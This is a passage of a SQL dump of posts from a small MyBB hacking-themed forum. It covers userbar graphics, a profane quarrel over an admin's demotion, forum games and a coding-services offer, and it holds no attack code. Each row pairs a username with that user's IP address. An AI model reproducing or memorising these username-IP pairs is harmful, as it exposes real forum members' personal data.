'267', '1190', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '82', 'iTzIpod', '1346115283', '[quote=\'t3h jok3r\' pid=\'1190\' dateline=\'1346115120\'] Thanks for the announcement also the permission to edit the thread. So far, I\'m done with the changes. I\'m just trying to make a attractive Admin Userbar. [/quote] Good luck with that. I wanna have an avatar like yours. :/ But I don\'t know how to make one. So oh well.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1b047f76b6055c58a335587e68e00ef9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1192', '264', '1173', '2', 'RE: Something', '0', '1', 't3h jok3r', '1346115847', 'Userbar layouts completed. Locked!', '41.174.59.145', '699284369', '1', '0', '0', '0', '1', '72ba9a675722212246ae9956dc552025', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1193', '267', '1188', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '1', 't3h jok3r', '1346115976', 'Thanks. It\'s completed, I don\'t like the icon but I sure do like the text :D Someone on HF made me the Avatar', '41.174.59.145', '699284369', '1', '0', '0', '0', '1', 'd2040272225801e55c10bd26ad8446c5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1194', '267', '1188', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '54', 'Sin Cara', '1346116150', 'I think the user bar are good not very good because if admin hire a Gfx master then the user bars will look cool... anyway best of luck!', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', 'adbc79438304a175948883d9c21c9f6d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1195', '267', '1194', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '1', 't3h jok3r', '1346116304', '[quote=\'Sin Cara\' pid=\'1194\' dateline=\'1346116150\'] I think the user bar are good not very good because if admin hire a Gfx master then the user bars will look cool... anyway best of luck! [/quote] I agree with hiring, I spend too much money with new hosts, DDoS protections, Domain, Theme, Plugins and Advertising so I\'m kinda low on cash. I\'m a [removed] and I earn money online. A lot of people underestimate me because I\'m [removed] but they don\'t know that a Blackhat can do anything.', '41.174.59.145', '699284369', '1', '0', '1', '1346191478', '1', '7a69c1bdbb96c3321d7343aa67dfe570', '0', '1346191478'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1196', '267', '1188', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '54', 'Sin Cara', '1346116518', 'I know GOOD GFX master. He can make unique user bars for just 8$ Paypal. If you interested then PM me admin.', '196.28.57.72', '-1004783288', '1', '0', '54', '1346116636', '1', '9adcc9cec6597f2f91b876480a5ecdec', '0', '1346116636'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1199', '267', '1195', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '82', 'iTzIpod', '1346119356', '[quote=\'t3h jok3r\' pid=\'1195\' dateline=\'1346116304\'] [quote=\'Sin Cara\' pid=\'1194\' dateline=\'1346116150\'] I think the user bar are good not very good because if admin hire a Gfx master then the user bars will look cool... anyway best of luck! [/quote] I agree with hiring, I spend too much money with new hosts, DDoS protections, Domain, Theme, Plugins and Advertising so I\'m kinda low on cash. I\'m a [removed] and I earn money online. A lot of people underestimate me because I\'m [removed] but they don\'t know that a Blackhat can do anything. [/quote] Isn\'t that too much personal info? Also @Sin Cara, are you saying t3h jok3r\'s GFX sucks? Or did I misread that...', '24.212.197.164', '416597412', '1', '0', '1', '1346191511', '1', '1437e07124184ca972d6c06864da5c51', '0', '1346191511'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1200', '265', '1184', '3', 'RE: Apathy Demoted', '0', '2', 'Apathy', '1346122125', 'Well I guess you do not care about our friendship anymore. I cannot believe my best buddy online would do this to me but I guess it just goes to show how life is. [hr] And iPod I liked you but whatever.', '173.206.129.78', '-1378975410', '0', '0', '2', '1346122831', '1', 'eeab48ad5bec5870ed2c3b2d8a0869a3', '0', '1346122831'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1201', '268', '1189', '49', 'RE: [Suggestion] Forum News Section', '0', '2', 'Apathy', '1346122894', 'Why would this be needed as there is like 5 active people?', '173.206.129.78', '-1378975410', '0', '0', '0', '0', '1', 'b5d600db56c2714a601679a5fc6c5250', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1202', '265', '1200', '3', 'RE: Apathy Demoted', '0', '82', 'iTzIpod', '1346123742', '[quote=\'Apathy\' pid=\'1200\' dateline=\'1346122125\'] Well I guess you do not care about our friendship anymore. I cannot believe my best buddy online would do this to me but I guess it just goes to show how life is. [/quote] Friend or not t3h jok3r wants to run a successful forum. He made you an Admin on LH because he trusted you and wanted you to assist him make a successful forum. But you weren\'t taking your job seriously. You disrespected me, you disrespected t3h jok3r, and you disrespected L33t Hacking. You abused your powers. There was a reason why I told you why I didn\'t like you through PM. And there is a reason why t3h jok3r demoted you. In fact, there is a reason for everything. You clearly are making a fool of yourself... It\'s sad enough that we have to deal with this bull crap... [hr] [quote=\'iTzIpod\' pid=\'1202\' dateline=\'1346123742\'] [quote=\'Apathy\' pid=\'1200\' dateline=\'1346122125\'] Well I guess you do not care about our friendship anymore. I cannot believe my best buddy online would do this to me but I guess it just goes to show how life is. [/quote] Friend or not t3h jok3r wants to run a successful forum. He made you an Admin on LH because he trusted you and wanted you to assist him make a successful forum. But you weren\'t taking your job seriously. You disrespected me, you disrespected t3h jok3r, and you disrespected L33t Hacking. You abused your powers. There was a reason why I told you why I didn\'t like you through PM. And there is a reason why t3h jok3r demoted you. In fact, there is a reason for everything. You clearly are making a fool of yourself... It\'s sad enough that we have to deal with this bull crap... [/quote] You liked me? Bitch please stop jerking me around. You never did. I know that for a fact.', '24.212.197.164', '416597412', '1', '0', '82', '1346124041', '1', '7b5c02b57f88a06f400e16e221048dbf', '0', '1346124041'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1203', '268', '1201', '49', 'RE: [Suggestion] Forum News Section', '0', '82', 'iTzIpod', '1346124353', '[quote=\'Apathy\' pid=\'1201\' dateline=\'1346122894\'] Why would this be needed as there is like 5 active people? [/quote] Maybe for future purposes...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5b5152a8d651b7fe3c56ae395b87261c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1204', '265', '1184', '3', 'RE: Apathy Demoted', '0', '2', 'Apathy', '1346124597', 'Well liked maybe the wrong term I thought you were a good addition to the forum and you do not know shit about me and joker so shut the fuck up. I honestly only care about what joker has to say. And ito throw away a friendship for a site that has like 7 active people really says something. I am disappointed and that is it.', '173.206.129.78', '-1378975410', '0', '0', '0', '0', '1', '1e7279102adb75b5548e3b665c93826c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1205', '265', '1204', '3', 'RE: Apathy Demoted', '0', '82', 'iTzIpod', '1346125100', '[quote=\'Apathy\' pid=\'1204\' dateline=\'1346124597\'] I wanna suck your dick. :o [/quote] I know you do! ;) Jokes aside. I may not know about this so called friendship of yours. But I can tell it came to an end. It is your fault.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9bde566ed5a4dd30c79e239b67fcd583', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1206', '265', '1184', '3', 'RE: Apathy Demoted', '0', '2', 'Apathy', '1346125260', 'Actually if you had never joined the forum this would not have happend so technically this is your fault.', '173.206.129.78', '-1378975410', '0', '0', '0', '0', '1', '10bf463a4d65c3a346f02bf6d6edfaef', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1207', '265', '1206', '3', 'RE: Apathy Demoted', '0', '82', 'iTzIpod', '1346125875', '[quote=\'Apathy\' pid=\'1206\' dateline=\'1346125260\'] Actually if you had never joined the forum this would not have happend so technically this is your fault. [/quote] Oh? Well if I\'m not mistaken, if you didn\'t make LQ posts, treated me with attittude, and start fucking with me,all of this wouldn\'t happen. Why don\'t you just get over it and spam the forum with more LQ posts and give that attitude you are giving me and t3h jok3r to more members on this forum and lets see what else you lose...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2ea4dd972c8a6469846a3b8962a1bf48', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1208', '265', '1207', '3', 'RE: Apathy Demoted', '0', '2', 'Apathy', '1346125929', '[quote=\'iTzIpod\' pid=\'1207\' dateline=\'1346125875\'] [quote=\'Apathy\' pid=\'1206\' dateline=\'1346125260\'] Actually if you had never joined the forum this would not have happend so technically this is your fault. [/quote] Oh? Well if I\'m not mistaken, if you didn\'t make LQ posts, treated me with attittude, and start fucking with me,all of this wouldn\'t happen. Why don\'t you just get over it and spam the forum with more LQ posts and give that attitude you are giving me and t3h jok3r to more members on this forum and lets see what else you lose... [/quote] Lol still talking big xD haha [hr] Anyway you do not know the shit I am going throu only joker knows.', '173.206.129.78', '-1378975410', '0', '0', '2', '1346126484', '1', '03a266f71248bd163e56997b0af4ea8e', '0', '1346126484'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1209', '265', '1184', '3', 'RE: Apathy Demoted', '0', '55', 'Baws', '1346126713', 'I\'m not sure what is going on, but you guys @Ipod and Apathy, can take this to pm. Anyways, I\'ve seen Apathy couple times around but yeah I guess that sucks for him.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '2ec1d143ce576fbecc072470e5651fb2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1210', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '55', 'Baws', '1346126821', 'I see good group suggestions, good luck everyone.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '3efb78ebb6b8a2b0469dd35e694777e6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1211', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '55', 'Baws', '1346126869', 'So that I can win this game, now please close it.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'b8f08eedb52b69d3b8bdaca1b2faabe5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1212', '269', '0', '3', 'Group Image not working', '0', '55', 'Baws', '1346127095', 'I noticed the only group\'s image that won\'t work is super moderator. [URL=http://img225.imageshack.us/i/capturehal.png/][IMG]http://img225.imageshack.us/img225/3200/capturehal.png[/IMG][/URL]', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '6b45bfe94082ec1dcf5b1c21a30225f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1213', '3', '7', '19', 'RE: Official Site Rules', '0', '55', 'Baws', '1346127150', 'Agreed with Timmy, I think you should lower the font.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'bb710eac78ec2d9263a11990d41497e4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1214', '238', '1157', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346127219', '[quote=\'iTzIpod\' pid=\'1157\' dateline=\'1346096690\'] [quote=\'Apathy\' pid=\'1149\' dateline=\'1346095802\'] [quote=\'iTzIpod\' pid=\'1148\' dateline=\'1346094126\'] Banned for not making sense. Also, I was not talking to you. I was talking to t3h jok3r. [/quote] Banned for me not noticin that. So fuck you :) [/quote] Dude what\'s with the words? -.- Banned for swearing and spamming thread + breaking rules. (Only post in threads 3 times a day) [/quote] Banned for having so many awards, and being a noob.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '5e33132d7c61ab4da60a303af284cdec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1215', '265', '1208', '3', 'RE: Apathy Demoted', '0', '82', 'iTzIpod', '1346127350', '[quote=\'Apathy\' pid=\'1208\' dateline=\'1346125929\'] [quote=\'iTzIpod\' pid=\'1207\' dateline=\'1346125875\'] [quote=\'Apathy\' pid=\'1206\' dateline=\'1346125260\'] Actually if you had never joined the forum this would not have happend so technically this is your fault. [/quote] Oh? Well if I\'m not mistaken, if you didn\'t make LQ posts, treated me with attittude, and start fucking with me,all of this wouldn\'t happen. Why don\'t you just get over it and spam the forum with more LQ posts and give that attitude you are giving me and t3h jok3r to more members on this forum and lets see what else you lose... [/quote] Lol still talking big xD haha [hr] Anyway you do not know the shit I am going throu only joker knows. [/quote] That\'s good for you. I didn\'t ask for your opinion about what you are going too. Whatever it is you are going through, I hope it is puberty. You must put more effort in your posts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c9d5ccf8b4a5a90806e2980d6299e88f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1216', '190', '665', '56', 'RE: Copy and paste game', '0', '55', 'Baws', '1346127397', 'What do you have copy/pasted right now? without changing it! mines this http://www.dell.com/us/p/alienware-x51/pd.aspx Showing my brother a small pc for his new apartment that\'s small with a good payment plan', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'faad708832baa6c8a6a520e4354b3a21', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1217', '265', '1215', '3', 'RE: Apathy Demoted', '0', '2', 'Apathy', '1346127737', '[quote=\'iTzIpod\' pid=\'1215\' dateline=\'1346127350\'] [quote=\'Apathy\' pid=\'1208\' dateline=\'1346125929\'] [quote=\'iTzIpod\' pid=\'1207\' dateline=\'1346125875\'] [quote=\'Apathy\' pid=\'1206\' dateline=\'1346125260\'] Actually if you had never joined the forum this would not have happend so technically this is your fault. [/quote] Oh? Well if I\'m not mistaken, if you didn\'t make LQ posts, treated me with attittude, and start fucking with me,all of this wouldn\'t happen. Why don\'t you just get over it and spam the forum with more LQ posts and give that attitude you are giving me and t3h jok3r to more members on this forum and lets see what else you lose... [/quote] Lol still talking big xD haha [hr] Anyway you do not know the shit I am going throu only joker knows. [/quote] That\'s good for you. I didn\'t ask for your opinion about what you are going too. Whatever it is you are going through, I hope it is puberty. You must put more effort in your posts. [/quote] LOL still taking like a big shot. Like how HQ you are right?', '173.206.129.78', '-1378975410', '0', '0', '0', '0', '1', '422f970a7d2999c3e70b67ffe1763358', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1218', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '2', 'Apathy', '1346128947', 'I am the champ so there. dfg', '173.206.129.78', '-1378975410', '0', '0', '0', '0', '1', '1c1fca758e50a1ff3759f10f66b06771', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1219', '249', '1211', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1346129063', '[quote=\'Baws\' pid=\'1211\' dateline=\'1346126869\'] So that I can win this game, now please close it. [/quote] Nah. I\'d rather not :) I want to win. And I did!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8a4c21214f8100a069d0124a37e6be01', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1220', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '2', 'Apathy', '1346129114', 'No I am going to win so there.', '173.206.129.78', '-1378975410', '0', '0', '0', '0', '1', '060dfc633c22916f18d80b21f91d577d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1221', '238', '1214', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346129404', '[quote=\'Baws\' pid=\'1214\' dateline=\'1346127219\'] [quote=\'iTzIpod\' pid=\'1157\' dateline=\'1346096690\'] [quote=\'Apathy\' pid=\'1149\' dateline=\'1346095802\'] [quote=\'iTzIpod\' pid=\'1148\' dateline=\'1346094126\'] Banned for not making sense. Also, I was not talking to you. I was talking to t3h jok3r. [/quote] Banned for me not noticin that. So fuck you :) [/quote] Dude what\'s with the words? -.- Banned for swearing and spamming thread + breaking rules. (Only post in threads 3 times a day) [/quote] Banned for having so many awards, and being a noob. [/quote] Banned for calling me a noob. (How am I a noob)?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dbb4b20edd6fcd9278e7b78e5a7a9133', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1222', '190', '1216', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1346129727', '[quote=\'Baws\' pid=\'1216\' dateline=\'1346127397\'] What do you have copy/pasted right now? without changing it! mines this http://www.dell.com/us/p/alienware-x51/pd.aspx Showing my brother a small pc for his new apartment that\'s small with a good payment plan [/quote] I died. Lol. I copied >_<~\"?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6937a4ec22286d0fed19de5423b8986b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1223', '190', '665', '56', 'RE: Copy and paste game', '0', '55', 'Baws', '1346130001', 'I died. Lol. I copied >_<~\"?', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '206e892967f4c82bf4776f2b8dfbcfd4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1224', '238', '1221', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346130192', '[quote=\'iTzIpod\' pid=\'1221\' dateline=\'1346129404\'] [quote=\'Baws\' pid=\'1214\' dateline=\'1346127219\'] [quote=\'iTzIpod\' pid=\'1157\' dateline=\'1346096690\'] [quote=\'Apathy\' pid=\'1149\' dateline=\'1346095802\'] [quote=\'iTzIpod\' pid=\'1148\' dateline=\'1346094126\'] Banned for not making sense. Also, I was not talking to you. I was talking to t3h jok3r. [/quote] Banned for me not noticin that. So fuck you :) [/quote] Dude what\'s with the words? -.- Banned for swearing and spamming thread + breaking rules. (Only post in threads 3 times a day) [/quote] Banned for having so many awards, and being a noob. [/quote] Banned for calling me a noob. (How am I a noob)? [/quote] Banned for having a bigger dick than me. :/', '98.176.49.100', '1655714148', '0', '0', '82', '1346161265', '1', '0e69211f7182b683dbaa4d4e5e192a9c', '0', '1346161265'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1225', '269', '1212', '3', 'RE: Group Image not working', '0', '82', 'iTzIpod', '1346130233', 't3h jok3r probably made a mistake. But hopefully this will be fixed tomorrow - or soon!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '844c6a6409cb4fbc9e571fd61680b81d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1226', '265', '1217', '3', 'RE: Apathy Demoted', '0', '82', 'iTzIpod', '1346130792', '[quote=\'Apathy\' pid=\'1217\' dateline=\'1346127737\'] [quote=\'iTzIpod\' pid=\'1215\' dateline=\'1346127350\'] [quote=\'Apathy\' pid=\'1208\' dateline=\'1346125929\'] [quote=\'iTzIpod\' pid=\'1207\' dateline=\'1346125875\'] [quote=\'Apathy\' pid=\'1206\' dateline=\'1346125260\'] Actually if you had never joined the forum this would not have happend so technically this is your fault. [/quote] Oh? Well if I\'m not mistaken, if you didn\'t make LQ posts, treated me with attittude, and start fucking with me,all of this wouldn\'t happen. Why don\'t you just get over it and spam the forum with more LQ posts and give that attitude you are giving me and t3h jok3r to more members on this forum and lets see what else you lose... [/quote] Lol still talking big xD haha [hr] Anyway you do not know the shit I am going throu only joker knows. [/quote] That\'s good for you. I didn\'t ask for your opinion about what you are going too. Whatever it is you are going through, I hope it is puberty. You must put more effort in your posts. [/quote] LOL still taking like a big shot. Like how HQ you are right? [/quote] I\'m not calling myself HQ or LQ. I try to be HQ. You are LQ. I remember seing you post posts like \"lol yay\" or \"cool\" etc. And you broke on of LH\'s rules. [hr] If you want to start a bitch war, go rifgt ahead and PM me..', '24.212.197.164', '416597412', '1', '0', '82', '1346130962', '1', 'a4f7dc5fa2eb7f66af7e7de30b9da853', '0', '1346130962'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1227', '190', '1223', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1346131261', '[quote=\'Baws\' pid=\'1223\' dateline=\'1346130001\'] I died. Lol. I copied >_<~\"? [/quote] That\'s not fair :o Copied: Roflcopter', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f0800e599b1e91aae15b15bdff373ccf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1228', '270', '0', '7', 'Hi everyone', '0', '61', 'NXK', '1346136280', 'I haven\'t really been active due to college, I\'m just starting so iv had alot of paper work n things iv needed to do. So iv been busy. I\'ll try to remain HQ and release more programs/tuts soon. Yes this is me saying sorry at 2:35 am. Get over it.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '3c7d86af1675e765757958393ea632db', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1229', '269', '1212', '3', 'RE: Group Image not working', '0', '55', 'Baws', '1346141059', 'Alright I\'m glad I pointed this out. :)', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '92812134262ae1ee1c161f6c2ef6301f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1230', '271', '0', '53', 'Minecraft/Rsps coding', '0', '67', 'HoverCatz', '1346143024', '[color=#FF0000][b]Hey everyone. :)[/b] Im here to tell you guys that i may be offering your coding needs. Whether it\'s a Mc plugin or a Rsps, does not matter. [/color] [color=#32CD32][b]My skills: [/b]5 years with Java coding (Old -> New Rsps, Mc servers, Other java game related stuff)[/color] [color=#FF1493]Just post below if you have Any questions, or want any coding done :P[/color] Edit: Prices depends on how much work there is :)', '178.74.56.137', '-1303758711', '1', '0', '67', '1346169944', '1', 'd4bc9eb43d0263d334904ffbdc1d10b3', '0', '1346169944'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, 